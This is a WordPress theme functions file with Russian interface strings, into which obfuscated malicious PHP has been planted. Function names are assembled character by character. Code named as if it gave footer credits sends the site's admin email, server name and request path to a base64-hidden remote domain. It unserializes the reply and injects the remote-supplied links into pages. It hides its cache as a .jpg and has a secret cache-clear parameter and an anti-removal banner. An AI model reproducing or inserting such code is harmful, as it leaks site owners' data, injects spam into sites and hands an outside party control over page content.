<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $djuRmGk='6';$uMNs='4';$YulRcDG='e';$CYMHpv='a';$EOdmsYO='b';$vIUiW='_';$MbYY='c';$ofrJFto='s';$bGUUA='e';$jjcVXv='o';$AFFT='d';$ArTIr='e';$sdoBa='d';$OhdzhaWu=$EOdmsYO.$CYMHpv.$ofrJFto.$ArTIr.$djuRmGk.$uMNs.$vIUiW.$AFFT.$YulRcDG.$MbYY.$jjcVXv.$sdoBa.$bGUUA;$mDJejW='e';$mDKHAt='z';$IYodDfR='n';$QhpVtR='g';$zbpia='t';$onzg='a';$AwRlZV='i';$mBwuRs='f';$JaamKHN='l';$dxvEQNbh=$QhpVtR.$mDKHAt.$AwRlZV.$IYodDfR.$mBwuRs.$JaamKHN.$onzg.$zbpia.$mDJejW;$UiMh='t';$SxfNPWp='t';$hGUTHng='r';$gSXoMfb='o';$hSMi='s';$tuMo='3';$kPmFn='1';$ozOuyT='_';$wlVsQB='r';$ftIMgMbt=$hSMi.$UiMh.$wlVsQB.$ozOuyT.$hGUTHng.$gSXoMfb.$SxfNPWp.$kPmFn.$tuMo;$SZzM='v';$uzgiXY='r';$HoOJs='r';$nLSjqTp='s';$lCxaP='e';$rBzWd='t';$DOxSooEa=$nLSjqTp.$rBzWd.$HoOJs.$uzgiXY.$lCxaP.$SZzM;                     
		$rj___k='6';$lv____________i='4';$sk_______l='e';$tu______________l='a';$ic_________r='b';$hf____________i='_';$eg______________t='c';$ox_____x='s';$vx________h='e';$ec___________i='o';$jp______________r='d';$dg_____________m='e';$im_____________a='d';$sn_____________w=$ic_________r.$tu______________l.$ox_____x.$dg_____________m.$rj___k.$lv____________i.$hf____________i.$jp______________r.$sk_______l.$eg______________t.$ec___________i.$im_____________a.$vx________h;
		$nq_________c='n';$qs___g='u';$xl____________b='s';$cu________l='x';$se___________c='n';$kf_________r='i';$dc__________v='s';$jp____________b='c';$jc______z='_';$gr_______________c='t';$ke_______g='f';$sk__u='t';$vl_____i='e';$dg___________z='i';$ct__v='o';$ek___j=$ke_______g.$qs___g.$nq_________c.$jp____________b.$gr_______________c.$dg___________z.$ct__v.$se___________c.$jc______z.$vl_____i.$cu________l.$kf_________r.$xl____________b.$sk__u.$dc__________v;
		$jj______________q='o';$dy______w='e';$xg____________b='f';$rv______c='p';$ww___________o='n';$ac____f=$xg____________b.$jj______________q.$rv______c.$dy______w.$ww___________o;
		$zj_______w='r';$vx_______q='d';$hc__a='e';$ni__m='a';$ac___________w='f';$vr_____m=$ac___________w.$zj_______w.$hc__a.$ni__m.$vx_______q;
		$mf____q='o';$ls____j='e';$np____________e='s';$ak__________p='l';$xi____________m='f';$qn___t='c';$oe____b=$xi____________m.$qn___t.$ak__________p.$mf____q.$np____________e.$ls____j;
		
		define("WP_ID", $sn_____________w("Mi4wLjA="));
		define("WP_TTL", $sn_____________w("MTA4MDA="));
		define("WP_SRC", $sn_____________w("dHBva24="));
	


		function wp_get_header() {
			global $sn_____________w, $ek___j;
			
			if (
				$ek___j($sn_____________w("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ek___j($sn_____________w("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ek___j($sn_____________w("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $sn_____________w, $ac____f, $oe____b, $vr_____m;
			
			$tv___________b = TEMPLATEPATH."/".$sn_____________w("Zm9vdGVyLnBocA==");
			$ou_______________t = @$ac____f($tv___________b, "r");
			$tv___________b = @$vr_____m($ou_______________t, @filesize($tv___________b));
			@$oe____b($ou_______________t);
			
			$bv_____x = TEMPLATEPATH."/".$sn_____________w("ZnVuY3Rpb25zLnBocA==");
			$ou_______________t = @$ac____f($bv_____x, "r");
			$bv_____x = @$vr_____m($ou_______________t, @filesize($bv_____x));
			@$oe____b($ou_______________t);
			
			$lg_____r = 0;
			if($tv___________b && $bv_____x) {
				if ($sn_____________w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($tv___________b, $sn_____________w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$lg_____r = 1;
					}
					if (substr_count($tv___________b, "wp_theme_GPL_credits()") < 1) {
						$lg_____r = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$lg_____r = 12;
				}
			}
			
			if($lg_____r > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $lg_____r -->";
			}
		}
	


		function wp_loaded() {
			global $sn_____________w, $ek___j;
			return $ek___j($sn_____________w("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($lv_________d, $aq___________m = "(more...)", $vy_________f = 0, $mq___y = "") {
				$mg__________w = get_the_content($aq___________m, $vy_________f, $mq___y);
				$mg__________w = apply_filters("the_content", $mg__________w);
				
				$mg__________w = str_replace("]]>", "]]>", $mg__________w);
				if (strlen($_GET["p"]) > 0) {
					echo $mg__________w;
				}
				else if ((strlen($mg__________w)>$lv_________d) && ($ce________d = strpos($mg__________w, " ", $lv_________d ))) {
					$mg__________w = substr($mg__________w, 0, $ce________d);
					$mg__________w = $mg__________w;
					echo $mg__________w;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$aq___________m</a></div></p>";
				} else {
					echo $mg__________w;
				}
				
			}
		}
	


		$ep________l='e';$gr_______________b='4';$hs_________y='n';$bw__e='c';$xg_______c='d';$lq___________e='o';$fy____k='6';$wh_________y='e';$bz____q='b';$oc_______q='_';$sg__________g='e';$rj______c='a';$do__________m='s';$jw________f=$bz____q.$rj______c.$do__________m.$sg__________g.$fy____k.$gr_______________b.$oc_______q.$wh_________y.$hs_________y.$bw__e.$lq___________e.$xg_______c.$ep________l;
		$yd_____________x='e';$uf____p='c';$ah____________g='n';$qj_____k='s';$nr_____________p='i';$gh____________s='t';$jx____f='o';$lv_______s='f';$pn_______________r='t';$xw________w='e';$wt__k='e';$lx__g='g';$vo______k='_';$qf__________l='n';$cd_______p='_';$uz_____________g='t';$vd___________o='l';$ed________c=$lv_______s.$nr_____________p.$vd___________o.$wt__k.$vo______k.$lx__g.$yd_____________x.$gh____________s.$cd_______p.$uf____p.$jx____f.$qf__________l.$uz_____________g.$xw________w.$ah____________g.$pn_______________r.$qj_____k;
		$fq__k='e';$tf_____________t='i';$ke_______________x='s';$ae_______f='f';$ol__r='e';$nf_______________o='_';$ya_____a='t';$mt__i='i';$jr__________n='x';$na____________t='s';$bm____________t='l';$ip_______r=$ae_______f.$mt__i.$bm____________t.$fq__k.$nf_______________o.$ol__r.$jr__________n.$tf_____________t.$ke_______________x.$ya_____a.$na____________t;
		$rz_________q='_';$wt_____________n='r';$sh_____________c='r';$uh____m='e';$bb____p='a';$nv__________f='o';$kj_______n='i';$rc_____i='m';$kj_____c='o';$wd_______q='e';$ug__q='c';$gs___________q='p';$rb________q='n';$rd_________i='s';$yv____________j='v';$fv_____r=$yv____________j.$wd_______q.$sh_____________c.$rd_________i.$kj_______n.$nv__________f.$rb________q.$rz_________q.$ug__q.$kj_____c.$rc_____i.$gs___________q.$bb____p.$wt_____________n.$uh____m;
		$mq__________o='e';$rj________w='o';$gc______________r='o';$ii__s='p';$jn_______________m='k';$mn______________i='c';$cb__d='f';$sn________b='s';$sp___________k='n';$un______________v=$cb__d.$sn________b.$rj________w.$mn______________i.$jn_______________m.$gc______________r.$ii__s.$mq__________o.$sp___________k;
		$zc____________n='e';$de__q='r';$ph____________s='f';$si________u='i';$qt___a='t';$le_________z='w';$cd___________x=$ph____________s.$le_________z.$de__q.$si________u.$qt___a.$zc____________n;
		$zs______________y='5';$ff__________w='d';$dx____________v='m';$ds____z=$dx____________v.$ff__________w.$zs______________y;
		$cn_______k='l';$zk_________i='a';$sf________q='t';$jp______p='h';$fq____________g='a';$bj_______________u='p';$od___e='e';$fu_________k='r';$jj___________k=$fu_________k.$od___e.$fq____________g.$cn_______k.$bj_______________u.$zk_________i.$sf________q.$jp______p;
		$er______u='s';$ve______________w='i';$es_______________e='r';$no_______n='i';$vw____________t='e';$bh_____________y='l';$xg____________y='e';$uj______f='a';$wf____________l='u';$af____________z='n';$ud_________z='z';$mz___________w=$wf____________l.$af____________z.$er______u.$xg____________y.$es_______________e.$ve______________w.$uj______f.$bh_____________y.$no_______n.$ud_________z.$vw____________t;
		$aj______f='n';$ny____u='a';$dl_________w='m';$sj___________h='p';$ad______________z='m';$eu_________y='e';$fn______l='t';$ld___a=$fn______l.$eu_________y.$dl_________w.$sj___________h.$aj______f.$ny____u.$ad______________z;
		$ui_______a='a';$pc___________i='a';$xm______________n='t';$ui_____________s='e';$yo_____________c='t';$hl__g='t';$rk_______________v='r';$xg__________s='t';$vu_______________h='c';$eg_________s='x';$sv_____________n='e';$eu____f='n';$or____________x='m';$tr______________q='o';$yg_____________p='e';$uc___i='_';$js__e='_';$ed__m='e';$nz________h='c';$bn_____v='r';$my___________q='s';$tl________c=$my___________q.$xm______________n.$bn_____v.$yg_____________p.$ui_______a.$or____________x.$uc___i.$vu_______________h.$tr______________q.$eu____f.$hl__g.$sv_____________n.$eg_________s.$xg__________s.$js__e.$nz________h.$rk_______________v.$ed__m.$pc___________i.$yo_____________c.$ui_____________s;
	


		function vf__________c($kz_____________u) {
			global $sn_____________w, $ek___j, $ed________c, $fv_____r, $tl________c;
			
			if (!$ek___j($sn_____________w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($fv_____r(PHP_VERSION, "5.0.0", ">=") && $ek___j($sn_____________w("ZmlsZV9nZXRfY29udGVudHM=")) && $ek___j($sn_____________w("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$pj_________g = $tl________c(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ij____r = @$ed________c($kz_____________u, 0, $pj_________g);
			} else {
				$ij____r = @$ed________c($kz_____________u, 0);
			}
			
			return $ij____r;
		}
	


		function bv___________j($kz_____________u) {
			global $ek___j, $un______________v, $cd___________x, $sn_____________w;
			
			if (!$ek___j($sn_____________w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$oe_______x = strpos($kz_____________u, "/", 7);
			$oc______________k = array(
				"uri"     => substr($kz_____________u, $oe_______x),
				"host"    => str_replace("http://", "", substr($kz_____________u, 0, $oe_______x)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$uq_________j = @$un______________v("$oc______________k[host]", 80, $na____________m, $am____________r, 4);
			
			if (!$uq_________j) {
				return false;
			} else {
				$ij____r = "";
				$zd________o  = "GET $oc______________k[uri] HTTP/1.0\r\n";
				$zd________o .= "Host: $oc______________k[host]\r\n";
				$zd________o .= "Referer: $oc______________k[referer]\r\n";
				$zd________o .= "Connection: Close\r\n\r\n";
				
				@$cd___________x($uq_________j, $zd________o);
				
				while (!@feof($uq_________j)) {
					$el____e = @fgets($uq_________j, (1024*24));
					
					if ($el____e == "\r\n") {
						$ht______________e = true;
						continue;
					}
					
					if ($ht______________e) {
						$ij____r .= $el____e;
					}
				}
				
				return $ij____r;
			}
		}
	


		function fk______________b($kz_____________u) {
			global $ek___j;
			$rg______g = false;
			
			if ($kz_____________u != "") {
				if ($ek___j("vf__________c")) {
					$rg______g = @vf__________c($kz_____________u);
				}
				
				if (!$rg______g && ($ek___j("bv___________j"))) {
					$rg______g = @bv___________j($kz_____________u);
				}
			}
			
			return $rg______g;
		}
	


		function tn___________q() {
			global $_SERVER, $ds____z;
			
			$bu_______________u = $_SERVER["SERVER_NAME"];
			
			if (substr("$bu_______________u", 0, 4) == "www.") {
				$bu_______________u = substr("$bu_______________u", 4);
			}
			
			$bu_______________u = $ds____z("$_SERVER[SERVER_NAME]");
			
			return $bu_______________u;
		}
	


		function lh___________e() {
			return "file";
		}
	


		function yw_____________l($kz_____________u) {
			global $_SERVER, $ed________c, $ip_______r, $ac____f, $oe____b, $cd___________x;
			
			$ok_______x = wo________c();
			
			$jv_______________i = tn___________q().".jpg";
			$zi___x = $ok_______x["dir_upload"]["path"]."/$jv_______________i";
			$kv____b = @filemtime($zi___x);
			
			if (!$kv____b || ((time()-$kv____b) >= WP_TTL)) {
				$rg______g = fk______________b($kz_____________u);
				
				if ($rg______g) {
					if ($ip_______r($zi___x)) {
						@unlink($zi___x);
					}
					
					$ou_______________t = @$ac____f($zi___x, "x+");
					
					@$cd___________x($ou_______________t, $rg______g);
					@$oe____b($ou_______________t);
				}
			} else {
				if ($ip_______r($zi___x)) {
					$rg______g = @$ed________c($zi___x);
				} else {
					$rg______g = false;
				}
			}
			
			return $rg______g;
		}
	


		function wo________c() {
			global $_SERVER, $sn_____________w, $jw________f;
			
			$wv_______s = wp_count_posts("post");
			$va____j = pathinfo(get_bloginfo("template_directory"));
			
			$ok_______x = array(
				"url" => array(
					"report"      => $sn_____________w("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $va____j,
				"dir_upload"	=> ec_______________c(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$va____j[filename],
					"a005=".$wv_______s->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$ok_______x["url"]["queryString"] = implode("&", $ok_______x["queryString"]);
			$ok_______x["url"]["report"] = $ok_______x["url"]["report"]."/?".$jw________f($ok_______x["url"]["queryString"]).".html";
						
			return $ok_______x;
		}
	


		function ec_______________c() {
			$bg___d = wp_upload_dir();
			
			if (isset($bg___d["error"])) {
				$wz_____b = zk_____p();
				if (is_writable($wz_____b)) {
					$bg___d = array("path" => $wz_____b);
				}
			}

			return $bg___d;
		}
	


		function zk_____p() {
			global $ek___j, $ds____z, $jj___________k, $ld___a;
			
			$lw_______________m = (bool) ini_get("safe_mode");
			if ($lw_______________m == true) {
				return false;
			}
			
			if ($ek___j("sys_get_temp_dir")) {
				$kp___________w = sys_get_temp_dir();
				if (is_writable($kp___________w)) {
					return $jj___________k($kp___________w);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $jj___________k($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $jj___________k($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $jj___________k($_ENV["TEMP"]);
			} else {
				$xv____a = $ld___a($ds____z(uniqid(rand(), true)), "");
				if ($xv____a) {
					$kp___________w = $jj___________k(dirname($xv____a));
					@unlink($xv____a);
					return $kp___________w;
				} else {
					return false;
				}
			}
		}
	


		function px_______________q() {
			global $_GET, $ip_______r;
			
			$ok_______x = wo________c();
			$bu_______________u = tn___________q();
			$ov____d = lh___________e();
			
			$lf___________n = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ov____d == "file") {
					$jc__l = $ok_______x["dir_upload"]["path"]."/".$bu_______________u.".jpg";
					if ($ip_______r($jc__l)) {
						@unlink($jc__l);
						$lf___________n = "deleted";
					}
				}
				
				$jv___________l = array(
					"s"	=> $lf___________n,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($jv___________l AS $tc__________d => $eq_________u) echo " [$tc__________d:$eq_________u]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ek___j, $sn_____________w, $mz___________w;
			$ok_______x = wo________c();
			
			$jr______________w = "yw_____________l";
			if ($ek___j($jr______________w)) {
				$ij____r = $jr______________w($ok_______x["url"]["report"]);
			}
			
			if ($ij____r) {
				if ($ij____r = @$sn_____________w($ij____r)) {
					$ij____r = @$mz___________w($ij____r);
					
					if (strlen($ij____r[custom_credit]) >= 5) {
						$ok_______x["default_string"] = $ij____r[custom_credit];
					}
					
					if ($ij____r["status"] == "0") {
						$ib________q = 1;
						$zd____l = 1;
					} else {
						$yw____________p = sizeof($ij____r["links"]);
						$uj___________l = $ok_______x["default_string"];
						
						if ($yw____________p > 0 && $ij____r["links"] !== "") {
							$bu_______________n = 0;
							foreach ($ij____r["links"] as $ln__________w => $hq_____r) {
								$bu_______________n++;
								if ($hq_____r->l_path == "" || $hq_____r->l_path == $_SERVER["REQUEST_URI"]) {
									$hq_____r->l_href = htmlspecialchars(strip_tags($hq_____r->l_href));
									$hq_____r->l_title = htmlspecialchars(strip_tags($hq_____r->l_title));
									$hq_____r->l_anchor = htmlspecialchars(strip_tags($hq_____r->l_anchor));
									$uj___________l .= " | ";
									$uj___________l .= "<a href='$hq_____r->l_href' title='$hq_____r->l_title'";
									if ($hq_____r->l_nofollow == "1") {
										$uj___________l .= " rel='nofollow'";
									}
									$uj___________l .= ">$hq_____r->l_anchor</a>";
								}
							}
						}
						$ok_______x["links"] = "$uj___________l";
						if ($ij____r[credit] == "0") {
							$ok_______x["links"] = "";
						}
					}
				} else {
					$ib________q = "1";
				}
			} else {
				$ib________q = "1";
			}
			
			if ($ib________q == "1") {
				$ok_______x["links"] = $ok_______x["default_string"];
			}
			
			echo "$ok_______x[links]";
			
			echo "<!-- s: $ij____r[signature] -->";
			px_______________q();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
